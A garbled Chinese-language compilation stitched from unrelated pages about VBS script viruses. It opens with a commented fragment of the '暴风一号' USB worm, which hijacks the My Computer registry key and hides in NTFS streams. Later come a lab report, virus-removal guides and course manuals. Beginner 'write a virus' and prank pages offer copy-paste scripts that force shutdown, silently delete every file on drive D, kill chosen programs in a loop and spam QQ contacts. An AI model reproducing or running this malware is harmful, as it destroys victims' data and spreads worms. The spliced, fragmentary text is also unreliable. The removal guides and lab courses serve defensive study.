"REG_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\open\command\", Value1, "REG_EXPAND_SZ")CallWriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B3030 9D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv)'获取驱动器序列号的绝对值On Error Resume NextSet d=fso.GetDrive(Drv)GetSerialNumber=d.SerialNumber'返回十进制序列号，用于唯一标识一个磁盘卷GetSerialNumber=Replace(GetSerialNumber,"-","")'去掉负号End FunctionFunction GetMainVirus(N)'根据N的值获取不同的字符串On Error Resume NextMainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"'以驱动器的序列号绝对值为vbs病毒的名字If GetFileSystemType(GetSystemDrive())="NTFS" Then'系统盘是NTFS分区If N=1 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName'返回"c:\windows\system32\smss.exe:72161642.vbs"End IfIf N=0 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName'返回"c:\windows\explorer.exe:72161642.vbs"End IfElse'系统盘是FAT32分区GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName'返回"c:\windows\72161642.vbs"或者"c:\windows\system32\72161642.vbs"End IfEnd FunctionFunction VBSProcessCount(VBSPath)'返回指定路径vbs脚本的运行个数On Error Resume NextDim WMIService, ProcessList, ProcessVBSProcessCount=0Set WMIService=GetObject("winmgmts:\\.\root\cimv2")Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessListIf InStr(mandLine, VBSPath)>0 ThenVBSProcessCount=VBSProcessCount+1End IfNextEnd FunctionFunction PreDblInstance()'用来计数wscript进程的个数，如果大于等于3个那么返回TrueOn Error Resume NextPreDblInstance=FalseIf VBSProcessCount(WScript.ScriptFullName)>= 3 ThenPreDblInstance=TrueEnd IfEnd FunctionFunction GetTargetPath(LnkPath)'获取快捷方式的vbs脚本地址On Error Resume NextDim ShortcutSet Shortcut=WshShell.CreateShortcut(LnkPath)GetTargetPath=Shortcut.TargetPathEnd FunctionFunction GetCode(FullPath)'获取文件的所有代码On Error Resume NextDim FileTextSet FileText=FSO.OpenTextFile(FullPath, 1)GetCode=FileText.ReadAllFileText.CloseEnd FunctionFunction GetVersion()'获取windows版本Dim VerInfoVerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\WindowsNT\CurrentVersion\Windows\Ver"If ReadReg(VerInfo)="" ThenGetVersion=0ElseGetVersion=CInt(ReadReg(VerInfo))End IfEnd FunctionSub VirusAlert()'创建一个BFAlert.hta，然后打开该网页，黑黑的，什么都没有，吓人的On Error Resume NextDim HtaPath,HtaCodeHtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize""border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no""selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<fontstyle=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR >"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号</font>"&VBCRLF&"</DIV></BODY></HTML>"If FSO.FileExists(HtaPath)=False ThenCall CreateFile(HtaCode, HtaPath)Call SetHiddenAttr(HtaPath)End IfCall Run(HtaPath)End SubFunction GetInfectedDate()'获取感染日期On Error Resume NextDim DateInfoDateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"If ReadReg(DateInfo)="" ThenGetInfectedDate=""ElseGetInfectedDate=CDate(ReadReg(DateInfo))End IfEnd FunctionSub MakeJoke(Times)'恶搞，弹出光驱On Error Resume NextDim WMP, colCDROMsSet WMP = CreateObject( "WMPlayer.OCX" )Set colCDROMs = WMP.cdromCollectionIf colCDROMs.Count>0 ThenFor i=1 to TimescolCDROMs.Item(0).eject()WScript.Sleep 3000colCDROMs.Item(0).eject()NextEnd IfSet WMP = NothingEnd Sub。

vbs编程、汇编程序调试、木马植入和运行、缓冲区溢出程序编写

vbs编程、汇编程序调试、木马植入和运行、缓冲区溢出程序编写一、实验目的1．了解vbs病毒的感染及传播原理2．了解掌握木马的植入方法和运行原理3．掌握缓冲区溢出和堆溢出的原理及其区别。

二、实验内容（1）virus vbs脚本的编写：FSO对文件或文件夹的操作；对注册表的修改；汇编样例程序的运行和测试（2）学会3种木马的植入和运行的方法（3）学会缓冲区溢出的程序编写，参照样例编写带溢出漏洞代码，制造栈溢出和堆溢出。

三、所用仪器、材料（设备名称、型号、规格等或使用软件）PC机、虚拟机四、实验步骤及结果（一）vbs编程：1、对文件夹的操作（1）文件夹的创建：新建记事本，将下面的程序写入并保存，文件名为lgh，扩展名为.vbs程序代码：dim fs,sset fs=wscript.createobject("scripting.filesystemobject")if(fs.folderexists("F:\lgh")) thens="is available"msgbox"F:\lgh文件夹已创建"elses="not exist"set foldr=fs.createfolder("F:\lgh")end if保存为.vbs格式的文件之后，执行该文件，其结果如下所示：（2）文件夹的删除，新建记事本，将下面的程序写入并保存，文件名为lgh，扩展名为.vbsdim fsset fs=wscript.createobject("scripting.Filesystemobject")fs.deletefolder("F:\lgh ")msgbox " F:\lgh 文件夹已删除"执行该文件后的结果如下所示：2. 对注册表的操作（1）对注册表的写修改，对注册表的写修改，在记事本中编辑下面的程序，保存为.vbs格式文件后执行path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \"set ws=wscript.createobject("wscript.shell")t=ws.regwrite(path & "lgh","name")msgbox "注册表修改成功！"首先在运行环境下输入regedit命令，查看注册表信息如下所示：执行程序后会弹出如右所示的对话框再查看注册表，发现注册表已被修改（二）汇编程序调试首先运行“cmp1.asm“文件，用—d命令查看程序的执行结果：运行文件后的结果：（三）木马的植入和运行完整的木马程序一般由两个部份组成：一个是服务器程序，一个是控制器程序。

vbs病毒怎么杀

vbs病毒怎么杀vbs全称是Visual Basic Scripting，也叫VB脚本。

这就是个文本文件，用记事本就可以打开查看内容，都是一些代码。

一般这种文件可以由宿主程序直接解释执行。

当然，不排除vbs文件带有恶意代码的可能，也就是vbs病毒。

中毒症状：系统进程中一直有wscript.exe进程存在，机器变慢等与其他病毒相同的现象。

解决方案（Windows XP测试可行）：第一步：先要禁止wscript.exe的运行。

点击“开始→运行”，输入gpedit.msc。

第二步：在“组策略”窗格左侧，依次点击“计算机配置→Windows设置→安全设置→软件限制策略”项，然后点击“操作→创建新策略”菜单项。

再从左侧选择“其他规则”。

第三步：在右侧窗格空白处右击，在菜单中选择“新建路径规则”项。

在弹出的窗口中，点击“路径”后的“浏览”按钮，选择C:\Windows\System32文件夹下的wscript.exe 文件，并将“安全级别”设置为“不允许的”。

第四步：将C:\Windows下的System32、Dllcache和I386这两个文件夹下wscript.exe 的扩展名去除，以防止病毒突破限制运行。

注意，这期间会有Windows文件保护机制的报警，直接点击“取消→是”按钮即可。

第五步：在“任务管理器”中结束掉“wscript.exe”进程。

第六步：用IceSword等工具删除下面三个文件。

C:\Windows\.vbeC:\Windows\System32\.vbeC:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbs第七步：打开注册表编辑器，依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run项，删除<*><.vbe>键。

3分钟教你编写“病毒”，不懂编程的门外汉也能秒学会

3分钟教你编写“病毒”，不懂编程的门外汉也能秒学会提到编程，可能很多新手或者从未接触过编程的人会觉得特别高深，需要复杂的编译器等等，小编就给大家推荐一种脚本语言，vbs脚本语言，不需要编译器，用电脑自带的记事本就能够编写，下面小编教大家如何编写一个小小的脚本“病毒”程序，实现的功能就是悄无声息的禁止电脑中某个程序的运行。

1.控制面板->文件资源管理器选项->查看->隐藏已知文件夹类型的扩展名，如果前面勾选了就取消勾选，没有勾选就不用管。

2.新建一个文本文档，重命名为后缀为vbs的文件，如果第一步没有完成也就无法修改文件名的后缀。

3.右键vbs文件编辑，现在可以开始正式编写代码了。

doset bag = getobject('winmgmts:\\.\root\cimv2')set i = bag.execquery('select * from win32_process where name ='KuGou.exe'')for each objprocess in iobjprocess.terminatenextwscript.sleep 1000loop代码很简单，do loop是重复执行的意思，中间的代码被不断的执行，sleep 1000的意思是休眠1000毫秒，也就是中间的代码1秒钟执行一次，第二行代码的意思是遍历所有进程，然后第三行代码设置KuGou.exe为进程对象，接着for next 遍历系统正在运行的进程，如果有KuGou.exe的进程就将它杀掉，每秒执行一次。

代码完成了，是不是很简单！（看不懂也没关系，复制粘贴就行）4.保存文件，运行文件，之后你会发现自己的酷狗音乐不管怎样都打不开，当然你也可以把代码里面的KuGou.exe换成其他的软件的进程名，实现的效果就是禁止该软件的运行，即使用杀毒软件杀毒也无法运行该软件。

整人病毒vbs大全！

整⼈病毒vbs⼤全！新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下：On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上，好多⼈都那它没办法，哈哈—————————————————————————代码如下：domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下：while(1)msgbox “哈哈你被耍了！“loop—————————————————————————6、不断按下alt+f4 （开什么都关闭……）病毒太强必须关机才⾏！—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。

Win7环境下彻底清除VBS病毒的教程

Win7环境下彻底清除VBS病毒的教程说起VBS病毒，可能很多⽤户并不了解，但说起1kb快捷⽅式病毒，⽤户⼀定有所⽿闻，甚⾄亲⾝经历，这种1KB快捷⽅式病毒有⼀个名称叫：暴风⼀号。

TA可以通过U盘、MP4/MP5之类的可移动存储设备传播的，可能对移动设备没有什么太⼤的影响，但若是该移动设备插进计算机，那杀伤⼒还是很⼤的。

如何在Win7环境下彻底清除VBS病毒？⼩⾯⼩编就为⼤家带来Win7环境下彻底清除VBS病毒的教程。

⼀起去看看吧！ VBS病毒的能做什么？在显⽰隐藏⽂件和扩展名的情况下，U盘和我的电脑各盘符下多了⽂件Autorun.inf和*.VBS（名字为8位数字的VBS⽂件）根⽂件夹下的所有⽂件夹都变成了两份，⼀份是隐藏⽅式，另⼀份其实是快捷⽅式。

有时系统的显⽰隐藏⽂件都会失效，⽆法完全显⽰病毒⽂件（但是可以通过winrar的⽂件浏览看到），如果不能完全查杀的话，杀毒之后留下后遗症，也就是我的电脑⽆法打开、磁盘⽆法打开、只能⽤任务管理器。

有些⽤户说“我的电脑”打不开了，就是这个原因。

如何对付VBS病毒？ 1、⾸先点开始菜单，然后点“运⾏”；没有运⾏指令的话，直接按键盘上的开始按键+ E； 2、然后输⼊：reg add HKCR\batfile\shell\open\command /ve /d "\"%1\" %*" /f 3、怕输错的直接复制粘贴过去也⼀样； 4、然后在桌⾯上新建⼀个⽂本⽂档，之后复制粘贴以下内容：@echo offmode con cols=53 lines=30echo.echo U盘病毒*.VBS专杀echo.echo 正在杀毒，请稍候。

echo.start /min taskkill /im explorer.exe /fstart /min taskkill /im wscript.exe /fif exist %systemRoot%\*.vbs del /a /q /f %systemRoot%\*.vbs & echo 发现VBS病毒！if exist %systemRoot%\system32\*.vbs del /a /q /f %systemRoot%\system32\*.vbsecho 执⾏清理中。

VBS病毒

貌似有点像1KB快捷方式的病毒，请不要删除文件夹，真实的文件已被隐藏，这个病毒软件用杀毒软件无法清除，有一个专杀工具，…1KB快捷方式病毒专杀工具从网上搜索“文件夹变成1k快捷方式”，得到很多网友的解决方法，现整理如下，希望对各位有所帮助。

方法一：1、光盘启动，格式化所有盘，重装系统。

2、关闭所有驱动器的自动运行功能，这步非常重要，如果不会，百度一下吧。

3、到这个网站：/zhuansha/kill_folder.html 下载这个专杀工具可恢复所有被隐藏的内容。

方法二：1、重装系统，不动除C盘外的其它盘。

完成后不要做任何其它操作。

（如果C盘、桌面有重要文件，请先备份）2、关闭所有驱动器的自动运行功能，这步非常重要，如果不会，百度一下吧。

3、显示出所有系统文件(不会的朋友先百度下)，用点击右键打开的方法，打开其它盘，就能看到快捷方式和病毒，这些可以全部删掉。

(千万不要因为好奇或失误双击啊，不然系统就白装了)4、到这个网站：/zhuansha/kill_folder.html 下载这个专杀工具可恢复所有被隐藏的内容。

经多台电脑使用，证明此法简单可行。

方法三：不用重装系统也能彻底清除此病毒的方法，操作比较专业。

是windows PE下把所有vbs结尾的文件都删掉包括所有显示的快捷方式，病毒的问题就可以解决了！！很管用的，大家遇到这种情况可以试试！用光盘进winpe（如果硬盘上装有winpe则开机时选择进入winpe即可），搜索*.vbs（*表示任意文件名），将搜索出来的结果全部删除。

其实，这病毒是这样运行的。

通过AutoRun.inf指向*********.vbs这个脚本文件，来自动运行病毒，感染全部磁盘根目录，这些目录变成快捷方式，再指向那个vbs文件，以后要预防这种病毒就是要禁用系统的自动运行功能。

此毒中招后的一个显著特征是：硬盘各个分区原有的正常文件夹被隐藏，代之以1KB的同名文件夹.lnk文件。

vbs病毒

'@ thank you! make use of other person to get rid of an enemy, white trap _2001
''开场白,第一个字符“@”是这个病毒传染时的标记
on error resume next ''这一句很重要，主要是在程序执行时如果发生错误就接着
call SearchHTML(x & "\")
end if
next
if fso.FileExists(defpath) then fso.DeleteFile defpath
''如果存在"C:\Readme.html" ，就删除它
end sub
sub ExecuteMail()
dim defpath, smailc, MAX_SIZE, whb(), title(10) ''声明各个变量
smailc = 4
Redim whb(smailc)
whb(0) = "pr@"
...
whb(3) = "ms@"
end if
end sub
Function getErr()
''本函数主要是检测前一条语句是否成功返回了Scripting.FileSystemObject对象，
''内容略
end function
sub ExecutePage()
dim Html_Str,adi,vf,wdf, wdf2,wdf3,wdsf, wdsf2
Vbs_Str = GetScriptCode("vbscript") ''获得此程序的VBScript code

(完整word版)脚本病毒实验(word文档良心出品)

脚本病毒实验【实验内容】脚本实验平台根据用户指定需求，自动生成脚本病毒代码，并在界面中呈现给用户，用户可以编辑代码，运行脚本，观察脚本运行现象，并分析脚本实现，脚本实验具体内容包括：(1)复制病毒副本到系统文件夹；(2)复制病毒副本到启动菜单；(3)禁止“运行”菜单；(4)禁止“关闭系统”菜单；(5)禁止显示桌面所有图标；(6)禁止“任务栏”和“开始”；(7)禁止“控制面板”；(8)修改“IE”默认页。

【实验原理】脚本病毒通常是JavaScript或VBScript等语言编写的恶意代码，一般带有广告性质，会修改IE首页、修改注册表等信息，对用户计算机造成破坏。

通过网页进行的传播的病毒较为典型，脚本病毒还会有如下前缀：VBS、JS(表明是何种脚本编写的)，如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。

典型的脚本病毒通过邮件方式进行传播，如图2.4.1-1所示的代码为病毒通过向Outlook 中的地址簿中联系人地址发送邮件，从而将病毒代码以附件的形式广泛传播到互联网其它主机。

图2.4.1-1【实验环境】Windows实验台【实验步骤】打开Windows实验台，点击桌面“病毒实验”，选择“脚本病毒实验”，进入其实施面板，如图2.4.1-2所示。

图2.4.1-2一、脚本病毒代码分析和查看分别选择相应的脚本文件，学生用户即可查看脚本病毒代码。

在界面左侧功能选择区选择实验名称，用户在界面右侧将会看到该脚本病毒的全部代码。

如图2.4.1-3所示。

图2.4.1-3学生用户如需要编辑脚本病毒代码，用户在界面右侧将会看到该脚本病毒的全部代码，在此基础上编辑代码，将会生成用户自定义的脚本病毒，点击“保存脚本”按钮将把编辑好的脚本文件永久保存，如果编辑过程出现错误或者异常，点击“重置脚本”将恢复最初的脚本代码。

实验进行前，要先点击“初始化病毒工具”按钮，对其实验所需的工具进行初始化；在实验过程中，如果所需的工具被杀毒软件查杀，要再次点击“初始化病毒工具”按钮，对工具重新进行初始化，以便实验顺利进行。

实验八脚本病毒

实验八脚本病毒一、实验目的1．了解脚本病毒的工作原理；2．观察病毒感染现象并手工查杀病毒。

二、实验环境1．本练习由单人为一组进行。

2．首先使用“快照X”恢复Windows系统环境。

三、实验原理恶意脚本是指一切以制造危害或者损害系统功能为目的而从软件系统中增加、改变或删除的任何脚本。

VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。

2000年5月4日，在欧美爆发了“爱虫”网络蠕虫病毒，造成了比“美丽莎”病毒破坏性更大的经济损失。

这个病毒是通过Microsoft Outlook电子邮件系统传播的，邮件的主题为“I LOVE YOU”，并包含一个附件。

一旦在Microsoft Outlook里打开这个邮件，系统就会自动复制并向地址簿中的所有邮件电址发送这个病毒。

这个病毒属于vbs脚本病毒，可以通过html，irc，email进行大量的传播。

svir.vbs病毒具备“爱虫”病毒的部分功能，是以“爱虫”病毒为基础，减弱其破坏性，并将感染范围控制到一定的范围内的模拟病毒。

四、实验步骤1．网页恶意代码(1) 恶意网页1新建记事本HostilityCode1.txt，在文本中编写如下代码，保存代码并退出，更改扩展名.txt为.html，双击HostilityCode1.html页面，观察页面效果。

（如果打开页面时出现安全警告，单击右键选择“允许阻止的内容”）<HTML><BODY><SCRIPT>var color = new Arraycolor[1]= " black"color[2]= " white"for(x=0;x<3;x++){ document.bgColor = color[x]if(x==2){ x=0}}</SCRIPT></BODY></HTML>页面效果：。

VBS脚本病毒教程

VBS脚本病毒教程VBS教程（文本版）就像多数计算机教程一样，我们从"Hello World！"程序开始我们的练习。

什么？不知道是什么意思？就是说大部分的计算机程序设计教程开篇入门都是编写一个小程序，执行这个程序的结果就是在计算机的屏幕上或者dos窗口中显示一行文字：Hello World！好了，我们开始吧。

打开你的"记事本"程序，在编辑窗口填写：msgbox "Hello World!"然后用鼠标单击"文件"菜单，单击"保存"，把"保存在"一栏设为桌面，在"文件名"一栏中填写kk.vbs，单击"保存"就可以了。

然后最小化"记事本"窗口，在桌面上寻找你刚刚保存的kk.vbs，然后双击。

看到弹出的对话框了没有，单击"确定"，对话框消失了。

说明之一：上面的操作中，保存位置放在桌面，仅仅是为了执行方便，你保存到其他的地方完全没有问题，只要你知道你保存在什么地方就可以了，什么？是废话，自己保存的当然知道保存在那里了。

不，自己保存的文件自己找不到的人我见的多了去了。

文件名你可以随意填写，不一定非要写kk，只要符合Windows的文件命名规则就可以了，但是扩展名必须是vbs，什么?不知道什么是扩展名？就是文件名中"."后的那部分，简单说，就是vbs脚本文件命名时必须是：xxx.vbs，其中xxx你随意。

说明之二：在记事本编辑窗口中写的这行是什么意思？Msgbox是VBS内建的函数，每一个函数都可以完成一定的功能，你只需要按照语法要求，在函数的相应部分填写相应的内容就可以了，这部分内容我们称为参数，当然函数执行的结果我们称为返回值，一个函数可以有返回值也可以没有，可以有参数也可以没有。

你不用了解函数是怎么运作的，只要了解这个函数能干什么就行了。